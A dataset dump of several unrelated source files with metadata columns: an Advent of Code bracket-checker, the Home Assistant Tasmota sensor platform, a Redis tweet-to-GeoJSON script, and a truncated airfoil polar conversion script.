")": 3,
"]": 57,
"}": 1197,
">": 25137,
}
def read() -> Iterator[str]:
with open("d10/input.txt") as f:
for line in f:
yield line.strip()
def check(line: str) -> str | None:
"""
>>> check("()")
>>> check("(]")
']'
>>> check("(")
>>> check("]")
']'
"""
stack = []
for c in line:
match c, stack:
case ("{", _) | ("(", _) | ("<", _) | ("[", _):
stack.append(c)
case c, []:
return c
case c, [*_, opener] if c != CLOSER[opener]:
return c
case c, [*_, opener] if c == CLOSER[opener]:
stack.pop()
return None
def get_scores(lines: Iterable[str]) -> Iterator[int]:
for line in lines:
character = check(line)
if character is None:
continue
yield SCORES[character]
if __name__ == "__main__":
print(sum(get_scores(read())))
| zh | 0.262515 | >>> check("()") >>> check("(]") ']' >>> check("(") >>> check("]") ']' | 3.51315 | 4 |
homeassistant/components/tasmota/sensor.py | MrDelik/core | 22,481 | 6632521 | """Support for Tasmota sensors."""
from __future__ import annotations
from datetime import datetime
from typing import Any
from hatasmota import const as hc, sensor as tasmota_sensor, status_sensor
from hatasmota.entity import TasmotaEntity as HATasmotaEntity
from hatasmota.models import DiscoveryHashType
from homeassistant.components import sensor
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
ELECTRIC_CURRENT_AMPERE,
ELECTRIC_POTENTIAL_VOLT,
ENERGY_KILO_WATT_HOUR,
FREQUENCY_HERTZ,
LENGTH_CENTIMETERS,
LIGHT_LUX,
MASS_KILOGRAMS,
PERCENTAGE,
POWER_VOLT_AMPERE,
POWER_WATT,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
SPEED_KILOMETERS_PER_HOUR,
SPEED_METERS_PER_SECOND,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TEMP_KELVIN,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DATA_REMOVE_DISCOVER_COMPONENT
from .discovery import TASMOTA_DISCOVERY_ENTITY_NEW
from .mixins import TasmotaAvailability, TasmotaDiscoveryUpdate
DEVICE_CLASS = "device_class"
STATE_CLASS = "state_class"
ICON = "icon"
# A Tasmota sensor type may be mapped to either a device class or an icon, not both
SENSOR_DEVICE_CLASS_ICON_MAP: dict[str, dict[str, Any]] = {
hc.SENSOR_AMBIENT: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_APPARENT_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_BATTERY: {
DEVICE_CLASS: SensorDeviceClass.BATTERY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CCT: {
ICON: "mdi:temperature-kelvin",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CO2: {
DEVICE_CLASS: SensorDeviceClass.CO2,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_COLOR_BLUE: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_GREEN: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_RED: {ICON: "mdi:palette"},
hc.SENSOR_CURRENT: {
ICON: "mdi:alpha-a-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DEWPOINT: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
ICON: "mdi:weather-rainy",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DISTANCE: {
ICON: "mdi:leak",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ECO2: {ICON: "mdi:molecule-co2"},
hc.SENSOR_FREQUENCY: {
DEVICE_CLASS: SensorDeviceClass.FREQUENCY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_HUMIDITY: {
DEVICE_CLASS: SensorDeviceClass.HUMIDITY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ILLUMINANCE: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_IP: {ICON: "mdi:ip-network"},
hc.SENSOR_STATUS_LINK_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_MOISTURE: {ICON: "mdi:cup-water"},
hc.SENSOR_STATUS_MQTT_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_PB0_3: {ICON: "mdi:flask"},
hc.SENSOR_PB0_5: {ICON: "mdi:flask"},
hc.SENSOR_PB10: {ICON: "mdi:flask"},
hc.SENSOR_PB1: {ICON: "mdi:flask"},
hc.SENSOR_PB2_5: {ICON: "mdi:flask"},
hc.SENSOR_PB5: {ICON: "mdi:flask"},
hc.SENSOR_PM10: {
DEVICE_CLASS: SensorDeviceClass.PM10,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM1: {
DEVICE_CLASS: SensorDeviceClass.PM1,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM2_5: {
DEVICE_CLASS: SensorDeviceClass.PM25,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERFACTOR: {
ICON: "mdi:alpha-f-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERUSAGE: {
DEVICE_CLASS: SensorDeviceClass.POWER,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSURE: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSUREATSEALEVEL: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PROXIMITY: {ICON: "mdi:ruler"},
hc.SENSOR_REACTIVE_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_LAST_RESTART_TIME: {DEVICE_CLASS: SensorDeviceClass.TIMESTAMP},
hc.SENSOR_STATUS_RESTART_REASON: {ICON: "mdi:information-outline"},
hc.SENSOR_STATUS_SIGNAL: {
DEVICE_CLASS: SensorDeviceClass.SIGNAL_STRENGTH,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_RSSI: {
ICON: "mdi:access-point",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_SSID: {ICON: "mdi:access-point-network"},
hc.SENSOR_TEMPERATURE: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_TODAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
hc.SENSOR_TOTAL: {
DEVICE_CLASS: SensorDeviceClass.ENERGY,
STATE_CLASS: SensorStateClass.TOTAL_INCREASING,
},
hc.SENSOR_TOTAL_START_TIME: {ICON: "mdi:progress-clock"},
hc.SENSOR_TVOC: {ICON: "mdi:air-filter"},
hc.SENSOR_VOLTAGE: {
ICON: "mdi:alpha-v-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_WEIGHT: {ICON: "mdi:scale", STATE_CLASS: SensorStateClass.MEASUREMENT},
hc.SENSOR_YESTERDAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
}
SENSOR_UNIT_MAP = {
hc.CONCENTRATION_MICROGRAMS_PER_CUBIC_METER: CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
hc.CONCENTRATION_PARTS_PER_BILLION: CONCENTRATION_PARTS_PER_BILLION,
hc.CONCENTRATION_PARTS_PER_MILLION: CONCENTRATION_PARTS_PER_MILLION,
hc.ELECTRICAL_CURRENT_AMPERE: ELECTRIC_CURRENT_AMPERE,
hc.ELECTRICAL_VOLT_AMPERE: POWER_VOLT_AMPERE,
hc.ENERGY_KILO_WATT_HOUR: ENERGY_KILO_WATT_HOUR,
hc.FREQUENCY_HERTZ: FREQUENCY_HERTZ,
hc.LENGTH_CENTIMETERS: LENGTH_CENTIMETERS,
hc.LIGHT_LUX: LIGHT_LUX,
hc.MASS_KILOGRAMS: MASS_KILOGRAMS,
hc.PERCENTAGE: PERCENTAGE,
hc.POWER_WATT: POWER_WATT,
hc.PRESSURE_HPA: PRESSURE_HPA,
hc.SIGNAL_STRENGTH_DECIBELS: SIGNAL_STRENGTH_DECIBELS,
hc.SIGNAL_STRENGTH_DECIBELS_MILLIWATT: SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
hc.SPEED_KILOMETERS_PER_HOUR: SPEED_KILOMETERS_PER_HOUR,
hc.SPEED_METERS_PER_SECOND: SPEED_METERS_PER_SECOND,
hc.SPEED_MILES_PER_HOUR: SPEED_MILES_PER_HOUR,
hc.TEMP_CELSIUS: TEMP_CELSIUS,
hc.TEMP_FAHRENHEIT: TEMP_FAHRENHEIT,
hc.TEMP_KELVIN: TEMP_KELVIN,
hc.VOLT: ELECTRIC_POTENTIAL_VOLT,
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
)
class TasmotaSensor(TasmotaAvailability, TasmotaDiscoveryUpdate, SensorEntity):
"""Representation of a Tasmota sensor."""
_tasmota_entity: tasmota_sensor.TasmotaSensor
def __init__(self, **kwds: Any) -> None:
"""Initialize the Tasmota sensor."""
self._state: Any | None = None
self._state_timestamp: datetime | None = None
super().__init__(
**kwds,
)
async def async_added_to_hass(self) -> None:
"""Subscribe to MQTT events."""
self._tasmota_entity.set_on_state_callback(self.sensor_state_updated)
await super().async_added_to_hass()
@callback
def sensor_state_updated(self, state: Any, **kwargs: Any) -> None:
"""Handle state updates."""
if self.device_class == SensorDeviceClass.TIMESTAMP:
self._state_timestamp = state
else:
self._state = state
self.async_write_ha_state()
@property
def device_class(self) -> str | None:
"""Return the device class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(DEVICE_CLASS)
@property
def state_class(self) -> str | None:
"""Return the state class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(STATE_CLASS)
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if self._tasmota_entity.quantity in status_sensor.SENSORS:
return EntityCategory.DIAGNOSTIC
return None
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
# Hide fast changing status sensors
if self._tasmota_entity.quantity in (
hc.SENSOR_STATUS_IP,
hc.SENSOR_STATUS_RSSI,
hc.SENSOR_STATUS_SIGNAL,
hc.SENSOR_STATUS_VERSION,
):
return False
return True
@property
def icon(self) -> str | None:
"""Return the icon."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(ICON)
@property
def native_value(self) -> datetime | str | None:
"""Return the state of the entity."""
if self._state_timestamp and self.device_class == SensorDeviceClass.TIMESTAMP:
return self._state_timestamp
return self._state
@property
def force_update(self) -> bool:
"""Force update."""
return True
@property
def native_unit_of_measurement(self) -> str | None:
"""Return the unit this state is expressed in."""
return SENSOR_UNIT_MAP.get(self._tasmota_entity.unit, self._tasmota_entity.unit)
| """Support for Tasmota sensors."""
from __future__ import annotations
from datetime import datetime
from typing import Any
from hatasmota import const as hc, sensor as tasmota_sensor, status_sensor
from hatasmota.entity import TasmotaEntity as HATasmotaEntity
from hatasmota.models import DiscoveryHashType
from homeassistant.components import sensor
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
CONCENTRATION_PARTS_PER_BILLION,
CONCENTRATION_PARTS_PER_MILLION,
ELECTRIC_CURRENT_AMPERE,
ELECTRIC_POTENTIAL_VOLT,
ENERGY_KILO_WATT_HOUR,
FREQUENCY_HERTZ,
LENGTH_CENTIMETERS,
LIGHT_LUX,
MASS_KILOGRAMS,
PERCENTAGE,
POWER_VOLT_AMPERE,
POWER_WATT,
PRESSURE_HPA,
SIGNAL_STRENGTH_DECIBELS,
SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
SPEED_KILOMETERS_PER_HOUR,
SPEED_METERS_PER_SECOND,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TEMP_KELVIN,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import DATA_REMOVE_DISCOVER_COMPONENT
from .discovery import TASMOTA_DISCOVERY_ENTITY_NEW
from .mixins import TasmotaAvailability, TasmotaDiscoveryUpdate
DEVICE_CLASS = "device_class"
STATE_CLASS = "state_class"
ICON = "icon"
# A Tasmota sensor type may be mapped to either a device class or an icon, not both
SENSOR_DEVICE_CLASS_ICON_MAP: dict[str, dict[str, Any]] = {
hc.SENSOR_AMBIENT: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_APPARENT_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_BATTERY: {
DEVICE_CLASS: SensorDeviceClass.BATTERY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CCT: {
ICON: "mdi:temperature-kelvin",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_CO2: {
DEVICE_CLASS: SensorDeviceClass.CO2,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_COLOR_BLUE: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_GREEN: {ICON: "mdi:palette"},
hc.SENSOR_COLOR_RED: {ICON: "mdi:palette"},
hc.SENSOR_CURRENT: {
ICON: "mdi:alpha-a-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DEWPOINT: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
ICON: "mdi:weather-rainy",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_DISTANCE: {
ICON: "mdi:leak",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ECO2: {ICON: "mdi:molecule-co2"},
hc.SENSOR_FREQUENCY: {
DEVICE_CLASS: SensorDeviceClass.FREQUENCY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_HUMIDITY: {
DEVICE_CLASS: SensorDeviceClass.HUMIDITY,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_ILLUMINANCE: {
DEVICE_CLASS: SensorDeviceClass.ILLUMINANCE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_IP: {ICON: "mdi:ip-network"},
hc.SENSOR_STATUS_LINK_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_MOISTURE: {ICON: "mdi:cup-water"},
hc.SENSOR_STATUS_MQTT_COUNT: {ICON: "mdi:counter"},
hc.SENSOR_PB0_3: {ICON: "mdi:flask"},
hc.SENSOR_PB0_5: {ICON: "mdi:flask"},
hc.SENSOR_PB10: {ICON: "mdi:flask"},
hc.SENSOR_PB1: {ICON: "mdi:flask"},
hc.SENSOR_PB2_5: {ICON: "mdi:flask"},
hc.SENSOR_PB5: {ICON: "mdi:flask"},
hc.SENSOR_PM10: {
DEVICE_CLASS: SensorDeviceClass.PM10,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM1: {
DEVICE_CLASS: SensorDeviceClass.PM1,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PM2_5: {
DEVICE_CLASS: SensorDeviceClass.PM25,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERFACTOR: {
ICON: "mdi:alpha-f-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_POWERUSAGE: {
DEVICE_CLASS: SensorDeviceClass.POWER,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSURE: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PRESSUREATSEALEVEL: {
DEVICE_CLASS: SensorDeviceClass.PRESSURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_PROXIMITY: {ICON: "mdi:ruler"},
hc.SENSOR_REACTIVE_POWERUSAGE: {
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_LAST_RESTART_TIME: {DEVICE_CLASS: SensorDeviceClass.TIMESTAMP},
hc.SENSOR_STATUS_RESTART_REASON: {ICON: "mdi:information-outline"},
hc.SENSOR_STATUS_SIGNAL: {
DEVICE_CLASS: SensorDeviceClass.SIGNAL_STRENGTH,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_RSSI: {
ICON: "mdi:access-point",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_STATUS_SSID: {ICON: "mdi:access-point-network"},
hc.SENSOR_TEMPERATURE: {
DEVICE_CLASS: SensorDeviceClass.TEMPERATURE,
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_TODAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
hc.SENSOR_TOTAL: {
DEVICE_CLASS: SensorDeviceClass.ENERGY,
STATE_CLASS: SensorStateClass.TOTAL_INCREASING,
},
hc.SENSOR_TOTAL_START_TIME: {ICON: "mdi:progress-clock"},
hc.SENSOR_TVOC: {ICON: "mdi:air-filter"},
hc.SENSOR_VOLTAGE: {
ICON: "mdi:alpha-v-circle-outline",
STATE_CLASS: SensorStateClass.MEASUREMENT,
},
hc.SENSOR_WEIGHT: {ICON: "mdi:scale", STATE_CLASS: SensorStateClass.MEASUREMENT},
hc.SENSOR_YESTERDAY: {DEVICE_CLASS: SensorDeviceClass.ENERGY},
}
SENSOR_UNIT_MAP = {
hc.CONCENTRATION_MICROGRAMS_PER_CUBIC_METER: CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,
hc.CONCENTRATION_PARTS_PER_BILLION: CONCENTRATION_PARTS_PER_BILLION,
hc.CONCENTRATION_PARTS_PER_MILLION: CONCENTRATION_PARTS_PER_MILLION,
hc.ELECTRICAL_CURRENT_AMPERE: ELECTRIC_CURRENT_AMPERE,
hc.ELECTRICAL_VOLT_AMPERE: POWER_VOLT_AMPERE,
hc.ENERGY_KILO_WATT_HOUR: ENERGY_KILO_WATT_HOUR,
hc.FREQUENCY_HERTZ: FREQUENCY_HERTZ,
hc.LENGTH_CENTIMETERS: LENGTH_CENTIMETERS,
hc.LIGHT_LUX: LIGHT_LUX,
hc.MASS_KILOGRAMS: MASS_KILOGRAMS,
hc.PERCENTAGE: PERCENTAGE,
hc.POWER_WATT: POWER_WATT,
hc.PRESSURE_HPA: PRESSURE_HPA,
hc.SIGNAL_STRENGTH_DECIBELS: SIGNAL_STRENGTH_DECIBELS,
hc.SIGNAL_STRENGTH_DECIBELS_MILLIWATT: SIGNAL_STRENGTH_DECIBELS_MILLIWATT,
hc.SPEED_KILOMETERS_PER_HOUR: SPEED_KILOMETERS_PER_HOUR,
hc.SPEED_METERS_PER_SECOND: SPEED_METERS_PER_SECOND,
hc.SPEED_MILES_PER_HOUR: SPEED_MILES_PER_HOUR,
hc.TEMP_CELSIUS: TEMP_CELSIUS,
hc.TEMP_FAHRENHEIT: TEMP_FAHRENHEIT,
hc.TEMP_KELVIN: TEMP_KELVIN,
hc.VOLT: ELECTRIC_POTENTIAL_VOLT,
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Tasmota sensor dynamically through discovery."""
@callback
def async_discover(
tasmota_entity: HATasmotaEntity, discovery_hash: DiscoveryHashType
) -> None:
"""Discover and add a Tasmota sensor."""
async_add_entities(
[
TasmotaSensor(
tasmota_entity=tasmota_entity, discovery_hash=discovery_hash
)
]
)
hass.data[
DATA_REMOVE_DISCOVER_COMPONENT.format(sensor.DOMAIN)
] = async_dispatcher_connect(
hass,
TASMOTA_DISCOVERY_ENTITY_NEW.format(sensor.DOMAIN),
async_discover,
)
class TasmotaSensor(TasmotaAvailability, TasmotaDiscoveryUpdate, SensorEntity):
"""Representation of a Tasmota sensor."""
_tasmota_entity: tasmota_sensor.TasmotaSensor
def __init__(self, **kwds: Any) -> None:
"""Initialize the Tasmota sensor."""
self._state: Any | None = None
self._state_timestamp: datetime | None = None
super().__init__(
**kwds,
)
async def async_added_to_hass(self) -> None:
"""Subscribe to MQTT events."""
self._tasmota_entity.set_on_state_callback(self.sensor_state_updated)
await super().async_added_to_hass()
@callback
def sensor_state_updated(self, state: Any, **kwargs: Any) -> None:
"""Handle state updates."""
if self.device_class == SensorDeviceClass.TIMESTAMP:
self._state_timestamp = state
else:
self._state = state
self.async_write_ha_state()
@property
def device_class(self) -> str | None:
"""Return the device class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(DEVICE_CLASS)
@property
def state_class(self) -> str | None:
"""Return the state class of the sensor."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(STATE_CLASS)
@property
def entity_category(self) -> EntityCategory | None:
"""Return the category of the entity, if any."""
if self._tasmota_entity.quantity in status_sensor.SENSORS:
return EntityCategory.DIAGNOSTIC
return None
@property
def entity_registry_enabled_default(self) -> bool:
"""Return if the entity should be enabled when first added to the entity registry."""
# Hide fast changing status sensors
if self._tasmota_entity.quantity in (
hc.SENSOR_STATUS_IP,
hc.SENSOR_STATUS_RSSI,
hc.SENSOR_STATUS_SIGNAL,
hc.SENSOR_STATUS_VERSION,
):
return False
return True
@property
def icon(self) -> str | None:
"""Return the icon."""
class_or_icon = SENSOR_DEVICE_CLASS_ICON_MAP.get(
self._tasmota_entity.quantity, {}
)
return class_or_icon.get(ICON)
@property
def native_value(self) -> datetime | str | None:
"""Return the state of the entity."""
if self._state_timestamp and self.device_class == SensorDeviceClass.TIMESTAMP:
return self._state_timestamp
return self._state
@property
def force_update(self) -> bool:
"""Force update."""
return True
@property
def native_unit_of_measurement(self) -> str | None:
"""Return the unit this state is expressed in."""
return SENSOR_UNIT_MAP.get(self._tasmota_entity.unit, self._tasmota_entity.unit)
| en | 0.747474 | Support for Tasmota sensors. # A Tasmota sensor type may be mapped to either a device class or an icon, not both Set up Tasmota sensor dynamically through discovery. Discover and add a Tasmota sensor. Representation of a Tasmota sensor. Initialize the Tasmota sensor. Subscribe to MQTT events. Handle state updates. Return the device class of the sensor. Return the state class of the sensor. Return the category of the entity, if any. Return if the entity should be enabled when first added to the entity registry. # Hide fast changing status sensors Return the icon. Return the state of the entity. Force update. Return the unit this state is expressed in. | 1.924917 | 2 |
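A standalone sketch of the lookup pattern the sensor platform above relies on: each Tasmota quantity maps to either a device class or an icon (not both), and a unit with no mapping falls through unchanged. The dictionary contents and quantity names below are toy stand-ins, not the Home Assistant constants.

DEVICE_CLASS, STATE_CLASS, ICON = "device_class", "state_class", "icon"
class_icon_map = {
    "Temperature": {DEVICE_CLASS: "temperature", STATE_CLASS: "measurement"},
    "TVOC": {ICON: "mdi:air-filter"},
}
unit_map = {"C": "°C"}

def resolve(quantity, unit):
    # mirrors the device_class / icon / native_unit_of_measurement properties above
    entry = class_icon_map.get(quantity, {})
    return entry.get(DEVICE_CLASS), entry.get(ICON), unit_map.get(unit, unit)

print(resolve("TVOC", "ppb"))        # (None, 'mdi:air-filter', 'ppb')
print(resolve("Temperature", "C"))   # ('temperature', None, '°C')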
jsoncreator.py | WillCusick/HashRace | 0 | 6632522 | import json
import redis
from datetime import datetime, timedelta
max_tweets_per_load = 200
delimit = ":\\:"
len_delimit = len(delimit)
def prune(red, tweet):
breaking_point = tweet.find(":\\:")
time_added = datetime.strptime(tweet[breaking_point+len_delimit:], "%Y-%m-%d %H:%M:%S.%f")
time_now = datetime.now()
time_elapsed = time_now - time_added
if time_elapsed.total_seconds() > 600:
red.srem("tweets", tweet)
return True
return False
def geoFormat(red):
if red.scard("tweets") > 2*max_tweets_per_load:
for tweet in red.smembers("tweets"):
prune(red, tweet)
json_dict = {'type': 'FeatureCollection',
'crs': {
'type': 'name',
'properties': {
'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'
}
},
'features': []}
tweet_count = 0
for tweet in red.smembers("tweets"):
if tweet_count >= max_tweets_per_load:
break
if prune(red, tweet):
continue
breaking_point = tweet.find(":\\:")
tweet_json = json.loads(tweet[:breaking_point].replace('\'','"'))
tweet_json['type'] = 'Feature'
json_dict['features'].append(tweet_json)
tweet_count += 1
return json_dict
geoFormat(redis.StrictRedis(host='localhost', port=6379, db=0))
| import json
import redis
from datetime import datetime, timedelta
max_tweets_per_load = 200
delimit = ":\\:"
len_delimit = len(delimit)
def prune(red, tweet):
breaking_point = tweet.find(":\\:")
time_added = datetime.strptime(tweet[breaking_point+len_delimit:], "%Y-%m-%d %H:%M:%S.%f")
time_now = datetime.now()
time_elapsed = time_now - time_added
if time_elapsed.total_seconds() > 600:
red.srem("tweets", tweet)
return True
return False
def geoFormat(red):
if red.scard("tweets") > 2*max_tweets_per_load:
for tweet in red.smembers("tweets"):
prune(red, tweet)
json_dict = {'type': 'FeatureCollection',
'crs': {
'type': 'name',
'properties': {
'name': 'urn:ogc:def:crs:OGC:1.3:CRS84'
}
},
'features': []}
tweet_count = 0
for tweet in red.smembers("tweets"):
if tweet_count >= max_tweets_per_load:
break
if prune(red, tweet):
continue
breaking_point = tweet.find(":\\:")
tweet_json = json.loads(tweet[:breaking_point].replace('\'','"'))
tweet_json['type'] = 'Feature'
json_dict['features'].append(tweet_json)
tweet_count += 1
return json_dict
geoFormat(redis.StrictRedis(host='localhost', port=6379, db=0))
| none | 1 | 2.709976 | 3 |
|
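A self-contained sketch of the set-member format that prune() and geoFormat() above appear to expect: a stringified feature dict, the ":\\:" delimiter, then a timestamp with microseconds. The coordinates and timestamp are invented for illustration, so no Redis server is needed to run it.

import json
from datetime import datetime

delimit = ":\\:"
stored = "{'geometry': {'type': 'Point', 'coordinates': [-77.03, 38.9]}}" + delimit + "2015-03-01 12:00:00.000000"
payload, stamp = stored.split(delimit, 1)
feature = json.loads(payload.replace("'", '"'))     # same single-quote workaround used above
feature["type"] = "Feature"
added = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S.%f")
collection = {"type": "FeatureCollection", "features": [feature]}
print(len(collection["features"]), added.year)      # 1 2015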
docs/src/data/openbemt_to_ccblade.py | ZhaoWenGuang/CCBlade.jl | 23 | 6632523 | import sys
import numpy as np
if __name__ == "__main__":
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('--plot', action='store_true')
parser.add_argument('xtfile')
parser.add_argument('ytfile')
parser.add_argument('outfilepattern')
args = parser.parse_args()
if args.plot:
import matplotlib.pyplot as plt
with open(args.xtfile, mode='r') as f:
comment, num_alpha, num_Re = f.readline().split()
num_alpha = int(num_alpha)
num_Re = int(num_Re)
xt = np.loadtxt(f, delimiter=' ')
xt.shape = (num_alpha, num_Re, -1)
yt = np.loadtxt(args.ytfile, delimiter=' ')
yt.shape = (num_alpha, num_Re, -1)
if args.plot:
fig, (ax_cl, ax_cd) = plt.subplots(nrows=2, sharex=True)
for i in range(num_Re):
# Check that the Reynolds numbers for this index are all the same.
if np.std(xt[:, i, 1]) > 1e-10:
print(f"warning: Reynolds numbers for index i = {i} appear to differ", file=sys.stderr)
alpha = np.degrees(xt[:, i, 0])
Re = xt[0, i, 1]
cl = yt[:, i, 0]
cd = yt[:, i, 1]
cl_over_cd = cl/cd
max_cl_over_cd = np.max(cl_over_cd)
max_cl_over_cd_alpha = alpha[np.argmax(cl_over_cd)]
fname = args.outfilepattern.format(i)
header = f"Re = {Re}e6, max(Cl/Cd) = {max_cl_over_cd} at alpha = {max_cl_over_cd_alpha} deg"
print(f"fname = {fname}, {header}")
data = np.concatenate(
[
alpha[:, np.newaxis], cl[:, np.newaxis], cd[:, np.newaxis]
],
axis=1)
np.savetxt(fname, data, delimiter=' ', header=header)
if args.plot:
ax_cl.plot(alpha, cl, label=f'Re = {Re}e6')
ax_cd.plot(alpha, cd, label=f'Re = {Re}e6')
if args.plot:
